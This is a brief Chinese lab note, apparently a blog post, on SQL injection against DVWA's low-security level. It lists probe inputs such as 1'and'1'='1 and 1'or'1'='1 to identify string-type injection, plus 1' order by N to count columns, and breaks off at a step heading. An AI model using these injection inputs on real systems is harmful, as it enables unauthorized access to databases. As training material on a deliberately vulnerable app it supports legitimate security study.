low
1.判断注入类型
输入1’and’1’=’1
输入1’and’1’=’2 无结果
输入1’or’1’=’1 类似1’or’1234’=’1234
由此判断出为字符型注入
2.判断字段数
ORDER BY 1 表示 所select 的字段按第一个字段排序,当后面跟的数字超过字段数时,则显示错误
输入1’ order by 1
输入1’ order by 2
输入1’ order by 3
由此判断有俩个字段
3.确定显示的字段顺序
DVWA-SQL注入
最新推荐文章于 2024-04-07 21:08:20 发布
![](https://img-home.csdnimg.cn/images/20240711042549.png)